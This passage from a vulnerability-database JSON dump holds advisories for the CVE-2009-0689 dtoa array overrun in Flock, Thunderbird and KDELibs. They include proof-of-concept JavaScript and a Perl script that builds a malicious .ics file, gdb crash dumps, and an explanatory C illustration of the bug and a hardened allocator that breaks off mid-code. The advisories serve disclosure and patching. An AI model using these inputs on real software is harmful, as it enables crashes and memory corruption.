\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c \n \n \n--- 5. Credits --- \nDiscovered by sp3x and Maksymilian Arciemowicz from SecurityReason.com. \n \n \n--- 6. Greets --- \nInfospec p_e_a pi3 \n \n \n--- 7. Contact --- \nEmail: \n- cxib {a.t] securityreason [d0t} com \n- sp3x {a.t] securityreason [d0t} com \n \nGPG: \n- http://securityreason.com/key/Arciemowicz.Maksymilian.gpg \n- http://securityreason.com/key/sp3x.gpg \n \nhttp://securityreason.com/ \nhttp://securityreason.com/exploit_alert/ - Exploit Database \nhttp://securityreason.com/security_alert/ - Vulnerability Database \n \n \n \n`\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/84943/j-overrun.txt"}, {"lastseen": "2016-12-05T22:12:07", "description": "", "published": "2009-12-12T00:00:00", "type": "packetstorm", "title": "Flock 2.5.2 Remote Array Overrun", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0689"], "modified": "2009-12-12T00:00:00", "id": "PACKETSTORM:83737", "href": "https://packetstormsecurity.com/files/83737/Flock-2.5.2-Remote-Array-Overrun.html", "sourceData": "`[ Flock 2.5.2 Remote Array Overrun (Arbitrary code execution) ] \n \nAuthor: Maksymilian Arciemowicz and sp3x \nhttp://SecurityReason.com \nDate: \n- Dis.: 07.05.2009 \n- Pub.: 11.12.2009 \n \nCVE: CVE-2009-0689 \nCWE: CWE-119 \nRisk: High \nRemote: Yes \n \nAffected Software: \n- Flock 2.5.2 \n \nFixed in: \n- Flock 2.5.5 \n \nNOTE: Prior versions may also be affected. \n \nOriginal URL: \nhttp://securityreason.com/achievement_securityalert/75 \n \n \n--- 0.Description --- \nFlock is a web browser built on Mozilla.s Firefox codebase that \nspecializes in providing social networking and Web 2.0 facilities built \ninto its user interface. Flock v2.5 was officially released on May 19, 2009. 
\n \nThe Flock browser is available as a free download, and supports \nMicrosoft Windows, Mac OS X, and Linux platforms. \n \n \n--- 1. Flock 2.5.2 Remote Array Overrun (Arbitrary code execution) --- \nThe main problem exists in the dtoa implementation. Flock uses the same \ndtoa as Firefox, SeaMonkey, Chrome, Opera etc., \nand it is the same issue as SREASONRES:20090625. \n \nhttp://securityreason.com/achievement_securityalert/63 \n \nThe fix for SREASONRES:20090625 used by OpenBSD was not sufficient. \nMore information about the OpenBSD fix and similar ones is in SREASONRES:20091030, \n \nhttp://securityreason.com/achievement_securityalert/69 \n \nA float literal with an arbitrary number of digits can be supplied, and \nparsing it overwrites memory. Kmax is defined as 15, so the freelist \narray has 16 slots (indices 0..15). The dtoa functions do not check the \nKmax limit, so a sufficiently long mantissa makes them index freelist \nelement 16 or beyond. \n \n \n--- 2. Proof of Concept (PoC) --- \n----------------------- \n<script> \nvar a=0.<?php echo str_repeat(\"1\",296450); ?>; \n</script> \n----------------------- \n \nProgram received signal SIGSEGV, Segmentation fault. \n0x67c68740 in js3250!JS_DHashTableEnumerate () \nfrom C:\\Program Files\\Flock\\js3250.dll \n(gdb) i r \neax 0x964619c7 -1773790777 \necx 0x2 2 \nedx 0x2 2 \nebx 0x2 2 \nesp 0x20e7f0 0x20e7f0 \nebp 0x1 0x1 \nesi 0x299d700 43636480 \nedi 0x299d701 43636481 \neip 0x67c68740 0x67c68740 \n<js3250!JS_DHashTableEnumerate+288> \neflags 0x210202 [ IF RF ID ] \ncs 0x1b 27 \nss 0x23 35 \nds 0x23 35 \nes 0x23 35 \nfs 0x3b 59 \ngs 0x0 0 \n \n(gdb) x/i 0x67c68740 \n0x67c68740 <js3250!JS_DHashTableEnumerate+288>: \nmov 0x67ce0458(,%edi,4),%eax \n(gdb) x/x $eax \n0x964619c7: Cannot access memory at address 0x964619c7 \n \n \n--- 3. 
SecurityReason Note --- \nOfficially SREASONRES:20090625 has been detected in: \n- OpenBSD \n- NetBSD \n- FreeBSD \n- MacOSX \n- Google Chrome \n- Mozilla Firefox \n- Mozilla Seamonkey \n- Mozilla Thunderbird \n- Mozilla Sunbird \n- Mozilla Camino \n- KDE (example: konqueror) \n- Opera \n- K-Meleon \n- F-Lock \n \nThis list is not yet closed. \n \n \n--- 4. Fix --- \nNetBSD fix (optimal): \nhttp://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h \n \nOpenBSD fix: \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c 
\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodI.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIx.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_dfmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c \n \n \n--- 5. Credits --- \nDiscovered by sp3x and Maksymilian Arciemowicz from SecurityReason.com. \n \n \n--- 6. Greets --- \nInfospec p_e_a pi3 \n \n \n--- 7. 
Contact --- \nEmail: \n- cxib {a.t] securityreason [d0t} com \n- sp3x {a.t] securityreason [d0t} com \n \nGPG: \n- http://securityreason.com/key/Arciemowicz.Maksymilian.gpg \n- http://securityreason.com/key/sp3x.gpg \n \nhttp://securityreason.com/ \nhttp://securityreason.pl/ \n \n \n`\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/83737/flock252-overrun.txt"}, {"lastseen": "2016-12-05T22:17:07", "description": "", "published": "2009-12-12T00:00:00", "type": "packetstorm", "title": "Thunderbird 2.0.0.23 Remote Array Overrun", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0689"], "modified": "2009-12-12T00:00:00", "id": "PACKETSTORM:83740", "href": "https://packetstormsecurity.com/files/83740/Thunderbird-2.0.0.23-Remote-Array-Overrun.html", "sourceData": "`[ Thunderbird 2.0.0.23 (lib) Remote Array Overrun (Arbitrary code \nexecution) ] \n \nAuthor: Maksymilian Arciemowicz and sp3x \nhttp://SecurityReason.com \nDate: \n- Dis.: 07.05.2009 \n- Pub.: 11.12.2009 \n \nCVE: CVE-2009-0689 \nCWE: CWE-119 \nRisk: High \nRemote: Yes \n \nAffected Software: \n- Thunderbird 2.0.0.23 \n \nFixed in: \n- Thunderbird 3.0 \n- Thunderbird 2.0.0.24pre \n \nNOTE: Prior versions may also be affected. \n \nOriginal URL: \nhttp://securityreason.com/achievement_securityalert/78 \n \n \n--- 0.Description --- \nThunderbird 2 includes many new features to help you manage your inbox. \nWith Thunderbird 2, it?s easier to prioritize and find your important \nemail with tags and the new find bar helps you find content within your \nemail faster. \nLightning brings the Sunbird calendar to the popular email client, \nMozilla Thunderbird. Since it's an extension, Lightning is tightly \nintegrated with Thunderbird, allowing it to easily perform email-related \ncalendaring tasks. \n \n \n--- 1. 
Thunderbird 2.0.0.23 (lib) Remote Array Overrun (Arbitrary code \nexecution) --- \nThe main problem exists in the dtoa implementation. Thunderbird uses the same \ndtoa as Firefox, etc. This problem also affects many add-ons for \nThunderbird. \n \nExamples of affected add-ons: \n- Lightning 0.9 \n- Thunderbrowse 3.2.6.7 \n- more \n \nIt is the same issue as SREASONRES:20090625. \n \nhttp://securityreason.com/achievement_securityalert/63 \n \nThe fix for SREASONRES:20090625 used by OpenBSD was not sufficient. \nMore information about the OpenBSD fix and similar ones is in SREASONRES:20091030, \n \nhttp://securityreason.com/achievement_securityalert/69 \n \nA float literal with an arbitrary number of digits can be supplied, and \nparsing it overwrites memory. Kmax is defined as 15, so the freelist \narray has 16 slots (indices 0..15). The dtoa functions do not check the \nKmax limit, so a sufficiently long mantissa makes them index freelist \nelement 16 or beyond. \n \n \n--- 2. Proof of Concept (PoC) --- \n \n(PoC for Lightning ) \n----------------------- \n#!/usr/bin/perl \n# SecurityReason.com \n# sp3x \n# tested on WinXp SP3 \n# Writes test.ics: an iCalendar event whose SUMMARY is a 296450-digit float literal \nuse strict; \nuse warnings; \n \nmy $header = \"BEGIN:VCALENDAR\\n\". \n\"PRODID:-//Mozilla.org/NONSGML Mozilla Calendar V1.1//EN\\n\". \n\"VERSION:2.0\\n\". \n\"BEGIN:VTIMEZONE\\n\". \n\"TZID:Europe/Prague\\n\". \n\"X-LIC-LOCATION:Europe/Prague\\n\". \n\"BEGIN:DAYLIGHT\\n\". \n\"TZOFFSETFROM:+0100\\n\". \n\"TZOFFSETTO:+0200\\n\". \n\"TZNAME:CEST\\n\". \n\"DTSTART:19700329T020000\\n\". \n\"RRULE:FREQ=YEARLY;INTERVAL=1;BYDAY=-1SU;BYMONTH=3\\n\". \n\"END:DAYLIGHT\\n\". \n\"BEGIN:STANDARD\\n\". \n\"TZOFFSETFROM:+0200\\n\". \n\"TZOFFSETTO:+0100\\n\". \n\"TZNAME:CET\\n\". \n\"DTSTART:19701025T030000\\n\". \n\"RRULE:FREQ=YEARLY;INTERVAL=1;BYDAY=-1SU;BYMONTH=10\\n\". \n\"END:STANDARD\\n\". \n\"END:VTIMEZONE\\n\". \n\"BEGIN:VEVENT\\n\". \n\"CREATED:20091117T095214Z\\n\". \n\"LAST-MODIFIED:20091117T095217Z\\n\". \n\"DTSTAMP:20091117T095214Z\\n\". 
\n\"UID:5d0cfefe-22f6-476e-93bf-bd13df140b18\\n\"; \nmy $s = \"SUMMARY:0.\"; \nmy $expl = \"1\" x 296450; \nmy $footer = \"\\nDTSTART;TZID=Europe/Prague:20100111T110000\\n\". \n\"DTEND;TZID=Europe/Prague:20100111T120000\\n\". \n\"END:VEVENT\\n\". \n\"END:VCALENDAR\\n\"; \n \nopen(myfile,'>>test.ics'); \nprint myfile $header.$s.$expl.$footer; \n----------------------- \n \n(PoC for Thunderbrowse ) \n----------------------- \n<script> \nvar a=0.<?php echo str_repeat(\"1\",333333); ?>; \n</script> \n----------------------- \n \nWhen we use Thunderbrowse to see this site, Thunderbird will crash with: \n \nProgram terminated with signal 11, Segmentation fault. \n#0 0xbb15d1e7 in ?? () \n \neax 0x0 0 \necx 0xa 10 \nedx 0x0 0 \nebx 0xbb16eb38 -1156125896 \nesp 0xbfbfce58 0xbfbfce58 \nebp 0xbfbfce74 0xbfbfce74 \nesi 0xb 11 \nedi 0xb768e700 -1217861888 \neip 0xbb15d1e7 0xbb15d1e7 \neflags 0x282 [ SF IF ] \ncs 0x23 35 \nss 0x2b 43 \nds 0x2b 43 \nes 0x2b 43 \nfs 0xab 171 \ngs 0xb3 179 \n \n(gdb) x/x ($eip) \n0xbb15d1e7: Cannot access memory at address 0xbb15d1e7 \n(gdb) x/x ($esi) \n0xb: Cannot access memory at address 0xb \n(gdb) x/x ($edi) \n0xb768e700: 0x1c71c71c \n \nnow esi=0xb and edi=0x1c71c71c \n \n(gdb) x/20x ($edi) \n0xb768e700: 0x1c71c71c 0xc71c71c7 0x71c71c71 0x1c71c71c \n0xb768e710: 0xc71c71c7 0x71c71c71 0x1c71c71c 0xc71c71c7 \n0xb768e720: 0x71c71c71 0x1c71c71c 0xc71c71c7 0x71c71c71 \n0xb768e730: 0x1c71c71c 0xc71c71c7 0x71c71c71 0x1c71c71c \n0xb768e740: 0xc71c71c7 0x71c71c71 0x1c71c71c 0xc71c71c7 \n \n(gdb) x/50x ($edi)+37000 \n0xb7697788: 0xc71c71c7 0x71c71c71 0x1c71c71c 0xc71c71c7 \n0xb7697798: 0x71c71c71 0x1c71c71c 0xc71c71c7 0x71c71c71 \n0xb76977a8: 0x1c71c71c 0xc71c71c7 0x71c71c71 0x1c71c71c \n0xb76977b8: 0xc71c71c7 0x71c71c71 0x1c71c71c 0xc71c71c7 \n0xb76977c8: 0x71c71c71 0x1c71c71c 0xc71c71c7 0x71c71c71 \n0xb76977d8: 0x1c71c71c 0xc71c71c7 0x71c71c71 0x1c71c71c \n0xb76977e8: 0xc71c71c7 0x91c71c71 0x0b76d741 0x1af63420 \n0xb76977f8: 0x7c6568c4 0xd74952a1 
0x552d1c87 0x4018081a \n0xb7697808: 0xcb313ca6 0xd16c5484 0x36d13467 0x130c4b7d \n0xb7697818: 0x92c1d06c 0xf70d9591 0x56bea87c 0x7c7bcc44 \n0xb7697828: 0xe6dd415d 0x210c53a8 0x482d162b 0x6d39c1c9 \n0xb7697838: 0x478f5fb2 0x9d6a2f46 0xe8b20d52 0xb012aa49 \n0xb7697848: 0xd75822f6 0x83ebbe5a \n \n \n--- 3. SecurityReason Note --- \nOfficially SREASONRES:20090625 has been detected in: \n- OpenBSD \n- NetBSD \n- FreeBSD \n- MacOSX \n- Google Chrome \n- Mozilla Firefox \n- Mozilla Seamonkey \n- Mozilla Thunderbird \n- Mozilla Sunbird \n- Mozilla Camino \n- KDE (example: konqueror) \n- Opera \n- K-Meleon \n- F-Lock \n \nThis list is not yet closed. \n \n \n--- 4. Fix --- \nNetBSD fix (optimal): \nhttp://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h \n \nOpenBSD fix: \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c 
\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodI.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIx.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_dfmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c \n \n \n--- 5. 
Credits --- \nDiscovered by sp3x and Maksymilian Arciemowicz from SecurityReason.com. \n \n \n--- 6. Greets --- \nInfospec p_e_a pi3 \n \n \n--- 7. Contact --- \nEmail: \n- cxib {a.t] securityreason [d0t} com \n- sp3x {a.t] securityreason [d0t} com \n \nGPG: \n- http://securityreason.com/key/Arciemowicz.Maksymilian.gpg \n- http://securityreason.com/key/sp3x.gpg \n \nhttp://securityreason.com/ \nhttp://securityreason.pl/ \n \n \n`\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/83740/thunderbird-overrun.txt"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:32", "bulletinFamily": "software", "cvelist": ["CVE-2009-1563", "CVE-2009-0689"], "description": "Please update CVE-2009-1563 BID:36851 and BID:36843\r\n\r\nMozilla has changed the credit. \r\n\r\nhttp://www.mozilla.org/security/announce/2009/mfsa2009-59.html\r\n\r\nand add the correct CVE: CVE-2009-0689.\r\n\r\nCVE-2009-1563 should never have existed. 
It is a duplicate.", "edition": 1, "modified": "2009-11-20T00:00:00", "published": "2009-11-20T00:00:00", "id": "SECURITYVULNS:DOC:22812", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22812", "title": "Firefox 3.5.3 Remote Array Overrun (UPDATE)", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:32", "bulletinFamily": "software", "cvelist": ["CVE-2009-1563", "CVE-2009-0689"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n[ KDE KDELibs 4.3.3 Remote Array Overrun (Arbitrary code execution) ]\r\n\r\nAuthor: Maksymilian Arciemowicz and sp3x\r\nhttp://SecurityReason.com\r\nDate:\r\n- - Dis.: 07.05.2009\r\n- - Pub.: 20.11.2009\r\n\r\nCVE: CVE-2009-0689\r\nRisk: High\r\nRemote: Yes\r\n\r\nAffected Software:\r\n- - KDELibs 4.3.3\r\n\r\nNOTE: Prior versions may also be affected.\r\n\r\nOriginal URL:\r\nhttp://securityreason.com/achievement_securityalert/74\r\n\r\n\r\n- --- 0.Description ---\r\nKDELibs is a collection of libraries built on top of Qt that provides\r\nframeworks and functionality for developers of KDE-compatible software.\r\nThe KDELibs libraries are licensed under LGPL.\r\n\r\n\r\n- --- 1. KDE KDELibs 4.3.2 Remote Array Overrun (Arbitrary code execution) ---\r\nThe main problem exists in the dtoa implementation. KDE has a very similar\r\ndtoa algorithm to the BSD, Chrome and Mozilla products. The problem is\r\nin the dtoa.cpp file \r\n\r\nhttp://websvn.kde.org/tags/KDE/4.3.3/kdelibs/kjs/dtoa.cpp?revision=1042584&view=markup\r\n\r\nand it is the same issue as SREASONRES:20090625.\r\n\r\nhttp://securityreason.com/achievement_securityalert/63\r\n\r\nThe fix for SREASONRES:20090625 used by OpenBSD was not sufficient. \r\nMore information about the OpenBSD fix and similar ones is in SREASONRES:20091030, \r\n\r\nhttp://securityreason.com/achievement_securityalert/69\r\n\r\nA float literal with an arbitrary number of digits can be supplied, and\r\nparsing it overwrites memory. 
Kmax is defined as 15, so the freelist array has 16 slots (indices\r\n0..15). The dtoa functions do not check the Kmax limit, so a sufficiently\r\nlong mantissa makes them index freelist element 16 or beyond.\r\n\r\n\r\n- --- 2. Proof of Concept (PoC) ---\r\n\r\n- -----------------------\r\n<script>\r\nvar a=0.<?php echo str_repeat("9",299999); ?>;\r\n</script>\r\n- -----------------------\r\n\r\nIf konqueror is used to view this PoC, it will crash. For example:\r\n\r\n- -----------------------\r\n<script>\r\nvar a=0.<?php echo str_repeat("1",296450); ?>;\r\n</script>\r\n- -----------------------\r\n\r\nProgram received signal SIGSEGV, Segmentation fault.\r\n[Switching to process 24845, thread 0x7e6e6800]\r\n0x090985c3 in diff () from /usr/local/lib/libkjs.so.5.0\r\n\r\n0x06db85c3 <diff+163>: mov %esi,(%ecx)\r\n\r\n#0 0x090985c3 in diff () from /usr/local/lib/libkjs.so.5.0\r\n#1 0x0909901b in kjs_strtod () from /usr/local/lib/libkjs.so.5.0\r\n#2 0x090738e5 in KJS::Lexer::lex () from /usr/local/lib/libkjs.so.5.0\r\n#3 0x0907300c in kjsyylex () from /usr/local/lib/libkjs.so.5.0\r\n#4 0x09072f86 in kjsyyparse () from /usr/local/lib/libkjs.so.5.0\r\n#5 0x090805cf in KJS::Parser::parse () from /usr/local/lib/libkjs.so.5.0\r\n#6 0x0908337f in KJS::InterpreterImp::evaluate ()\r\n\r\n(gdb) i r\r\neax 0x0 0\r\necx 0x220ff000 571469824\r\nedx 0x0 0\r\nebx 0x220fbb00 571456256\r\nesp 0xcfbc04e0 0xcfbc04e0\r\nebp 0xcfbc0518 0xcfbc0518\r\nesi 0xc71c71c7 -954437177\r\nedi 0x0 0\r\neip 0x21415c3 0x21415c3\r\n\r\nesi=0xc71c71c7\r\n\r\n\r\n- --- 3. SecurityReason Note ---\r\n\r\nOfficially SREASONRES:20090625 has been detected in:\r\n- - OpenBSD\r\n- - NetBSD\r\n- - FreeBSD\r\n- - MacOSX\r\n- - Google Chrome\r\n- - Mozilla Firefox\r\n- - Mozilla Seamonkey\r\n- - KDE (example: konqueror)\r\n- - Opera\r\n- - K-Meleon\r\n\r\nThis list is not yet closed. US-CERT declared that it would inform all vendors about this issue;\r\nhowever, it did not. Even greater confusion was caused by the new CVE number "CVE-2009-1563". 
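The bug that every advisory on this page describes in its section 1 (Kmax defined as 15, dtoa functions that never check the size class against it, and a mantissa long enough to reach freelist element 16) comes down to two unchecked lines in David Gay's dtoa: Balloc() reads freelist[k] and Bfree() stores through freelist[v->k]. The C program below is an added example written for this page; it is not code from the advisories, from SecurityReason or from any affected vendor. It reproduces the size-class computation of strtod's s2b() (nine decimal digits per 32-bit word, rounded up to a power of two) next to a reduced Balloc/Bfree freelist. The Bigint layout is simplified, KMAX takes the value the advisories cite, and s2b_size_class, freelist_index_in_bounds, balloc_hardened, bfree_hardened, freelist_count and hardened_roundtrip are this example's own names; the hardened pair is shaped like the k > Kmax checks that later netlib dtoa.c releases added, not a copy of any vendor's patch.

```c
/*
 * Added illustration of the CVE-2009-0689 freelist overrun in David Gay's
 * dtoa/gdtoa, reduced to the size-class computation of s2b() and the
 * Balloc()/Bfree() freelist. Example code written for this page; not the
 * advisories' or any vendor's code. The Bigint layout is simplified and
 * the *_hardened routines are this example's own, shaped like the
 * k > Kmax checks that later netlib dtoa.c releases added.
 */
#include <stdio.h>
#include <stdlib.h>

#define KMAX 15   /* Kmax as cited by the advisories: freelist has Kmax+1 = 16 slots */

typedef struct Bigint {
    struct Bigint *next;
    int k;            /* size class: maxwds == 1 << k */
    int maxwds;
    int sign;
    int wds;
    unsigned int x[1];
} Bigint;

static Bigint *freelist[KMAX + 1];

/* strtod's s2b(): nd decimal digits are packed nine per 32-bit word and the
 * Bigint is sized to the next power of two at or above that word count. */
int s2b_size_class(long nd)
{
    long x = (nd + 8) / 9;
    long y;
    int k;

    for (k = 0, y = 1; x > y; y <<= 1, k++)
        ;
    return k;
}

/* The original Balloc() does "if ((rv = freelist[k]))" and Bfree() does
 * "freelist[v->k] = v" with no check that k <= Kmax; this predicate is the
 * check they lack. We report the overrun here instead of performing it. */
int freelist_index_in_bounds(int k)
{
    return k >= 0 && k <= KMAX;
}

static Bigint *alloc_bigint(int k)
{
    size_t words = (size_t)1 << k;
    Bigint *rv = malloc(sizeof(Bigint) + (words - 1) * sizeof(unsigned int));

    if (rv) {
        rv->next = NULL;
        rv->k = k;
        rv->maxwds = (int)words;
    }
    return rv;
}

/* Hardened Balloc(): the freelist is consulted only for size classes it
 * covers; anything larger comes straight from malloc(). */
Bigint *balloc_hardened(int k)
{
    Bigint *rv = NULL;

    if (k <= KMAX && (rv = freelist[k]) != NULL)
        freelist[k] = rv->next;
    else if ((rv = alloc_bigint(k)) == NULL)
        return NULL;
    rv->sign = rv->wds = 0;
    return rv;
}

/* Hardened Bfree(): a block whose class lies beyond the array is released
 * with free() instead of being stored through freelist[v->k], which in the
 * original code is the out-of-bounds write. */
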